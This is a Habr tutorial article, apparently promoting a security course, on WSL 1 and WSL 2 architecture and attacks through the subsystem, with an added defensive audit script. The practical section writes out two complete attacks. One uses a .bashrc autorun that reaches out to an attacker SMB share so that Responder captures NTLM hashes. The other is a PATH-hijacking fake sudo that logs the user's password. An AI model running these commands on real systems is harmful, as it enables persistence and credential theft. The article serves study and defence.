WSL experiments. Part 1

Hello, friends! In October OTUS is launching a new stream of the "Linux Security" course. Ahead of the course start, we are sharing an article written by one of our instructors, Alexander Kolesnikov.

In 2016, Microsoft introduced the IT community to a new technology, WSL (Windows Subsystem for Linux), which later made it possible to bring together two former irreconcilable competitors that had fought for popularity among both ordinary and advanced OS users: Windows and Linux. This technology makes it possible to use Linux OS tools in a Windows environment without having to boot Linux, for example via multi-boot. On Habr you can find a large number of articles describing the benefits of using WSL. Unfortunately, at the time of writing, no studies of the security of this symbiosis of operating systems could be found on that resource. This post is an attempt to fix that. The article describes the features of the WSL 1 and WSL 2 architectures and examines several examples of attacks on systems that use these technologies. The material is split into two parts. The first presents the main theoretical attack methods from Linux and from Windows. The second article covers setting up a test environment and reproducing the attacks.

WSL 1: architectural features

For a deeper dive into WSL security issues, it is necessary to identify the main nuances of the subsystem's implementation. One of the main user tasks solved by WSL is the ability to work through a Linux terminal on a host running the Windows OS. Moreover, the compatibility on offer was so native that Linux executables (ELFs) could be run directly on the Windows system. To achieve this, a special subsystem was created in Windows 10 that allows Linux applications to be run using a set of specific system calls; in other words, an attempt was made to map the set of Linux syscalls onto Windows. Physically this was implemented by adding new drivers and a new process format. Schematically, the architecture looked like this:

[Figure: WSL 1 architecture diagram]

In fact, interaction with the Linux operating system was organized through several kernel modules and a special type of process: pico. From the diagram above, you can see that a process running in the Linux instance on the host must be native and must use the same resources as an ordinary Windows application. But how is this achieved? In the Drawbridge project, Windows process concepts were developed that provided everything an operating system (depending on its version) needs in order to run an application of another OS.

Note that the proposed abstraction made it possible not to focus on the specific operating system (in particular, Windows) in which a process of another OS is expected to run, and suggested a general approach.

Thus, any application inside a pico process can run without regard to the Windows kernel:

  1. Compatibility problems and translation of system calls must be solved by special providers;
  2. Access control must be performed through the Security Monitor. The monitor resides in the kernel, so Windows needed an upgrade in the form of a new driver that could act as a provider for such processes. A prototype pico process is shown schematically below:

[Figure: prototype pico process]

Since the Linux file system uses case-sensitive file and directory names, two types of file systems were added to Windows for working with WSL: VolFS and DriveFS. VolFS is an implementation of the Linux file system, while DriveFS is a file system that works by Windows rules but with the option of choosing case sensitivity.

WSL 2

WSL 1 had a number of limitations that did not allow it to be used for the widest range of tasks: for example, it could not run 32-bit Linux applications, and it was impossible to use device drivers. Therefore, in 2020, WSL 2 was released, which changed the approach to building the subsystem. WSL 2 is an optimized virtual machine whose resource consumption characteristics match those of WSL 1. Now, depending on the tasks the Windows OS user needs to solve, the required version of the Linux subsystem can be chosen. To reduce possible vulnerabilities, WSL 2 was implemented on top of Hyper-V in Windows 10. In this form, Windows is able to run the Linux operating system kernel in isolation. It is worth remembering that version 1 of WSL was introduced as a beta feature that was meant to show the direction of Windows development in this area, so the transition to Hyper-V was inevitable. The final architecture looks like this:

[Figure: WSL 2 architecture diagram]

In this version, the Windows and Linux kernels have their own resources, and the overlap exists only in the file system, but even this overlap is not complete. Interaction between the file systems is performed through a client-server wrapper that works using the 9P protocol.

Today Microsoft provides the ability to switch between WSL 1 and WSL 2. Both versions are available for use.

WSL Security

At the moment there are several works describing approaches to using legitimate OS tools to attack the interaction between the subsystems. We will use their materials to check whether the attacks are still relevant at the time of writing. General list of attacks and scenarios:

1. File system implementation: access rights, availability of shared directories / data exchange mechanisms.

Research was conducted to identify violations of access rules from Linux FS -> Windows FS and from Windows FS -> Linux FS. The research demonstrated the ability to modify a given file inside the target OS. Attempts were also made to substitute, duplicate and delete parts of the file systems.

Scenarios:

  • A. Attack from the Windows operating system: modification of files from the /etc directory of the Linux OS.
  • B. Attack from the Linux operating system: modification of files in the directories C:\Windows, C:\Program Files, C:\Users\<User>.

2. Network stack implementation.

The research was conducted using examples of attacks from the Linux operating system on Windows. Network stack features were used, namely the authentication mechanisms on various resources.

Scenarios:

  • Opening access to a port occupied by the Windows system
  • Opening a port without the appropriate rights
  • Running a reverse shell using an ELF file on the Windows operating system.

3. Hiding the launch of malicious software processes using the WSL subsystem.

The research was based on a simple fact: in the case of WSL 1, security subsystems cannot intercept events in another kernel that operates through a legitimate provider of the operating system. In the case of WSL 2, there is no way at all to observe events occurring in a separate kernel inside a lightweight virtual machine.

Scenarios:

1) Launch a remote access application on the system and inspect the logged events.

WSL 1 experiment: hash capture (Windows)

Finally we have reached the practical part. First, you need to set up a test environment. All experiments will be performed on a bench with Windows 10 2004 installed. The Ubuntu 18.04 image was chosen as the operating system image for WSL. The image was chosen arbitrarily; any other will work just as well. Commands for setting up the bench:

First you need to run powershell.exe as administrator.

For WSL 1 you need to run the following commands:

  1. Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux # enable the WSL feature
  2. Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804 -OutFile ~/Ubuntu.appx -UseBasicParsing # download the Linux image from the Microsoft Store
  3. Ubuntu.appx install --root # install the image. You may have to click through the setup process and create a new user with fewer rights than root. For our tests this will be the regular user sam.
  4. Restart-Computer # reboot
  5. After the bench restarts, you can call the bash command. If everything worked correctly, you will see output similar to this in the Windows console:

[Figure: bash prompt in the Windows console]

We will use the Kali Linux distribution as the attacker's machine; all machines must be on the same local network.

Suppose we have access to WSL on the Windows machine. Let's try an attack by calling a command from Linux. To carry out the attack, we will use a simple autorun mechanism: we will add our script so that it is executed in the Linux environment. To do this you need to modify the .bashrc file.

On the machine with WSL we execute:

  1. bash
  2. Change to the user's home directory: cd /home/sam/
  3. echo "/home/sam/.attack.sh" >> .bashrc
  4. echo 'icacls.exe "\\\\attacker_ip\\shareName\\" > /dev/null 2>&1' >> .attack.sh
  5. chmod u+x .attack.sh
  6. exit

On the Kali Linux machine we run:

  1. Responder -I eth0 -rdvw

On the Windows machine, start bash.

We wait for the result on the Kali Linux machine:

[Figure: Responder output on the Kali Linux machine]

Thus, we obtained the Windows user's hashes through the WSL subsystem by executing a command on the Linux system.

WSL 1 experiments: obtaining the user password (Linux OS)

Let's do one more experiment. This time we will add several commands to the .bashrc file in order to obtain the Linux operating system user's password.

Let's start bash and enter the commands:

  1. mkdir .hidden
  2. echo 'export PATH=$HOME/.hidden/:$PATH:' >> .bashrc
  3. echo 'read -sp "[sudo] password for $USER: " sudopass' > .hidden/sudo
  4. echo 'echo ""' >> .hidden/sudo
  5. echo 'sleep 2' >> .hidden/sudo
  6. echo 'echo "Sorry, try again."' >> .hidden/sudo
  7. echo 'echo $sudopass >> /home/sam/.hidden/pass.txt' >> .hidden/sudo
  8. echo '/usr/bin/sudo $@' >> .hidden/sudo
  9. chmod +x .hidden/sudo
  10. exit

For the attack to complete successfully, user sam needs to call sudo in the Linux terminal. After that, the Linux OS user's password will be in the pass.txt file:

[Figure: contents of pass.txt]
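As an added example that is not part of the original article: a defender-side audit for the two .bashrc tricks used in both WSL 1 experiments above (the hidden script appended to .bashrc, and the PATH entry that lets a user-writable sudo shadow /usr/bin/sudo). The throwaway home directory, its .bashrc contents and the fake sudo below are constructed for the demo; /home/sam mirrors the experiments.

```shell
#!/bin/sh
# Added example, not code from the article: audit a WSL user's login shell for
# the two persistence tricks used above (a hidden script appended to .bashrc,
# and a dotted directory under $HOME prepended to PATH so that a user-writable
# "sudo" shadows /usr/bin/sudo). The demo home directory below is constructed.

# Print (with line numbers) .bashrc lines that either invoke a hidden file under
# the home directory or export a PATH that starts with such a directory.
# Exit status 0 = something was flagged, 1 = file looks clean.
bashrc_suspicious_lines() {
    grep -nE '^[[:space:]]*(/home/[^/ ]+|\$HOME|~)/\.[^/ ]+|export[[:space:]]+PATH=(\$HOME|/home/[^/:]+)/\.' "$1"
}

# Print PATH entries that precede /usr/bin and are under the given home
# directory, relative, or empty: any of them lets a user-writable binary win.
# Exit status 0 = at least one such entry, 1 = none.
path_hijack_entries() {
    _home="$2"; _n=0
    _ifs="$IFS"; IFS=':'; set -f          # split on ':' only, no globbing
    for entry in $1; do
        case "$entry" in
            /usr/bin|/bin) break ;;        # entries after the system dirs cannot shadow them
            "$_home"|"$_home"/*|[!/]*|'') printf '%s\n' "$entry"; _n=$((_n + 1)) ;;
        esac
    done
    set +f; IFS="$_ifs"
    [ "$_n" -gt 0 ]
}

# Resolve which "sudo" a given PATH would run; compare the answer with /usr/bin/sudo.
resolve_sudo() {
    ( PATH="$1"; command -v sudo )
}

# Constructed demo environment: a throwaway home with the attacker's .bashrc
# lines and a fake sudo, as in the two experiments.
demo_dir=$(mktemp -d); trap 'rm -rf "$demo_dir"' EXIT
mkdir -p "$demo_dir/.hidden"
printf '#!/bin/sh\necho fake-sudo\n' > "$demo_dir/.hidden/sudo"
chmod +x "$demo_dir/.hidden/sudo"
printf 'alias ll="ls -l"\nexport PATH=$HOME/.hidden/:$PATH:\n/home/sam/.attack.sh\n' > "$demo_dir/.bashrc"

echo "suspicious .bashrc lines:";         bashrc_suspicious_lines "$demo_dir/.bashrc"
echo "PATH entries able to shadow sudo:"; path_hijack_entries "$demo_dir/.hidden/:/usr/local/bin:/usr/bin" "$demo_dir"
echo "sudo resolves to: $(resolve_sudo "$demo_dir/.hidden:/usr/bin")"
```

On a real WSL instance, run the three functions against the user's actual ~/.bashrc and $PATH; a sudo that resolves anywhere other than /usr/bin/sudo is the signal to look at.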

The implementation of the attacks is provided for informational purposes only.

The next part of the article will describe the implementation of the 9P protocol, consider writing a scanner for this protocol, and also carry out an attack using it.


Source: www.habr.com
